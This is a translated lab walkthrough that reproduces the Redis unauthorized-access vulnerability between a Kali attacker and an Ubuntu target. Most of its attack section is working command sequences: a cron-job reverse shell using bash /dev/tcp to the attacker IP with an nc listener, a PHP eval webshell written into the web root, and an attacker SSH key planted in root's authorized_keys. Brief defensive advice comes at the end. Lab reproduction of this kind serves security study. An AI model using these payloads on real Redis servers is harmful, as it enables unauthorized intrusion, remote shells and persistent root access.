Redis unauthorized access vulnerability recurrence
1. Introduction to Redis
Redis (Remote Dictionary Server), the remote dictionary service, is an open source log-type Key-Value database written in ANSI C language, supports the network, can be memory-based and persistent, and provides APIs in multiple languages.
-
Redis is an open source NoSQL database written in C language.
-
Redis runs based on memory and supports persistence (supports storage on disk). It adopts key-value (key-value pair) storage form and is an indispensable part of the current distributed architecture.
-
The Redis server program is a single-process model
-
The Redis service can start multiple Redis processes at the same time on one server.The actual processing speed of Redis completely depends on the execution efficiency of the main process. If only one Redis process is running on the server, when multiple clients access it at the same time, the server's processing capability will decrease to a certain extent; if multiple Redis processes are opened on the same server, Redis will improve concurrent processing. At the same time, it will put a lot of pressure on the server's CPU. That is: in the actual production environment, it is necessary to decide how many Redis processes to start based on actual needs
2. Conditions for vulnerability generation:
- Redis is bound to 0.0.0.0:6379, and no firewall rules are added to prevent other untrusted source IP access and other related security policies, and it is directly exposed to the public network.
- If password authentication is not set (default is empty), you can remotely log in to the redis service without a password.
3. Vulnerability hazards:
- Attackers can access internal data without authentication, which may lead to leakage of sensitive information. Hackers can also maliciously execute flushall to clear all data;
- An attacker can execute lua code through EVAL, or write a backdoor file (webshell) to the disk through the data backup function;
- In the most serious case, if Redis is running as root, the hacker can write the SSH public key file to the root account and log in to the victim server directly through SSH.
4. Environment deployment
Target machine Ubuntu:192.168.241.129
Attack aircraft kail: 192.168.241.128
Ubuntu download and install the latest redis
wget http://download.redis.io/releases/redis-6.2.7.tar.gz //简易使用低版本Redis
Unzip and enter the redis directory. Since there is a makefile, install it directly using the make
compilation method
If “It’s a good idea to run ‘make test’” appears, the installation is successful.
Then enter the src directory and copy redis-server
and redis-cli
to the /usr/bin
directory (start like this< a i=4> and do not need to enter the installation directory every time)redis-server
redis-cli
sudo cp redis-cli /usr/bin
sudo cp redis-server /usr/bin
Modify the configuration file redis.conf
注释掉bind 127.0.0.1 ::1 //注释掉仅允许本地连接
将protected-mode设置为no, //保护关掉
Then copyredis.conf
to the/etc/
directory
sudo cp redis.conf /etc/
Use the configuration in the file in the /etc/
directory to start the servicereids.conf
redis
sudo redis-server /etc/redis.conf //给redis-server服务root权限
Indicates successful startup
The attack aircraft is operated in the same way as the target aircraft and must be installed first.
However, there is no need to modify the configuration file. After installation, the vulnerability can be reproduced.
5. Vulnerability recurrence
kali: Check whether the target port 6379 is open
nmap -p 6379 -script redis-info 192.168.241.129 //-p 指定端口进行扫描
Use the following command to remotely log in to the Redis service folder path on the attack machine.
./redis-cli -h 192.168.241.129
redis-cli -h 目标主机IP地址 -p 端口号
If Redis does not configure a password by default, you can directly and successfully connect to the target Redis server. Enterinfo
to view version information
You can view the redis storage path
CONFIG GET dir
config get dir 获取redis用于文件持久化存储的路径
config get dbfilename 获取redis用于文件持久化存储的文件名
config set dir xxxx 修改路径
config set dbfilename xxx 修改文件名
savesave 命令是直接手动持久化内存中的数据
Start monitoring first
nc -lvp 4444
1.Write the task plan to the target and rebound the shell
set x "\n* * * * * bash -i >& /dev/tcp/192.168.241.128/4444 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
If save occurs (error) ERR
That is, the redis-server service does not have root permissions.
Use at this time
ps -ef | grep redis //查找redis进程
然后sudo kill -9 pid把redis干掉
重新用sudo权限启动就可以了
2.Write webshell
Conditions of use
- Target machine
redis
The connection is not authorized. It can be used on the attack machineredis-cli
to connect, as shown in the picture above, without login verification. - has opened the web server and knows the path (such as using
phpinfo
, or the error path), and you also need to have file read, write, add, delete, modify, and check permissions. - We can set dir to a directory
a
, anddbfilename
to the file nameb
, and then execute a>save
orbgsave
, then we can write an arbitrary file with the patha/b
Ubuntu needs to install and build a PHP environment
When specifying a directory, the directory must exist so that no error will be reported, otherwise an error will be reported.
config set dir /var/www/html 设置web目录
config set dbfilename webshell.php 设置备份文件名
set shell "<?php @eval($_POST['shell']);?>" 设置值
最好是写入:
set shell "\r\n\r\n<?php @eval($_POST['shell']);?>\r\n\r\n"
或set shell "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
save 保存
You can see that webshell.php has been generated in this directory of Ubuntu
You can see that writing to phpinfo can be successfully accessed
3. Write the SSH public key to realize ssh login
Conditions of use:
- root authority
- SSH key login is enabled and the /etc/.ssh file exists
First generate the ssh public key in the attacking machine (the generated content is in .ssh)
Kali enters:/root/.ssh directory
ssh-keygen -t rsa //两次要输入时,不写直接回车
Write the public key to a file and copy it to the src directory
(echo -e"\n";cat id_rsa.pub;echo -e "\n")>1.txt
cat 1.txt | redis-cli -h 192.168.241.129 -p 6379 -x set hack //将1.txt中的内容作为值写入到hack中
redis-cli -h 192.168.241.129 -p 6379 连接redis
config set dir /root/.ssh //更改redis备份路径为ssh公钥存放目录
config set dbfilename authorized_keys //设置上传公钥的备份文件名字为authorized_keys
save //保存
exit //退出
Note that there is no ./ssh directory under Ubuntu, you need to install ssh
sudo apt-get install openssh-server //安装ssh
/etc/init.d/ssh start //启动服务
/etc/init.d/ssh restart //重启服务
sudo su //切换root
ssh-keygen //生成key,不用输入密码,两次直接回车
After the ll
command directly appears./ssh
directory, which is a hidden directory and cannot be seenls
Log in using the following command
ssh -i id_rsa [email protected]
建议靶机改为Centos,否则反弹shell失败
在Centos上使用,Ubuntu上行不通,原因如下:
因为默认redis写文件后是644的权限,但ubuntu要求执行定时任务文件/var/spool/cron/crontabs/<username>权限必须是600也就是-rw-------才会执行,否则会报错(root) INSECURE MODE (mode 0600 expected),而Centos的定时任务文件/var/spool/cron/<username>权限644也能执行
因为redis保存RDB会存在乱码,在Ubuntu上会报错,而在Centos上不会报错
由于系统的不同,crontrab定时文件位置也会不同:
Centos的定时任务文件在/var/spool/cron/<username>
Ubuntu定时任务文件在/var/spool/cron/crontabs/<username>
6. Defense methods
1. Prohibit external access to the Redis service port;
2. It is prohibited to use root privileges to start the redis service;
3. Configure a security group to restrict the IPs that can connect to the Redis server;
4. Set a password and enable the firewall.